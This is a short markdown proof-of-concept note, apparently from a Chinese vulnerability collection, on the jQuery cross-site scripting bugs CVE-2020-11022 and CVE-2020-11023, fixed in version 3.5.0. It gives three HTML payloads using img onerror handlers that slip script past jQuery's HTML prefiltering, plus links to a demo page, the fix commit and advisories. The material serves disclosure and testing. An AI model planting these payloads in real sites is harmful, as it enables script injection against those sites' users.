jQuery _=1.0.3 _3.5.0 XSS (CVE-2020-11022-CVE-2020-11023).md

655 B / 2021-05-21 09:14:38

    # jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022/CVE-2020-11023)

此漏洞已在jQuery 3.5.0中修复。

PoC：

```
PoC 1.
<style><style /><img src=x onerror=alert(1)> 
PoC 2. (Only jQuery 3.x affected)
<img alt="<x" title="/><img src=x onerror=alert(1)>">
PoC 3.
<option><style></option></select><img src=x onerror=alert(1)></style>
```

jQuery XSS Examples：

https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html

ref：

* https://snyk.io/vuln/SNYK-JS-JQUERY-565129
* https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77
* https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
* https://forum.ywhack.com/thread-114981-1-1.html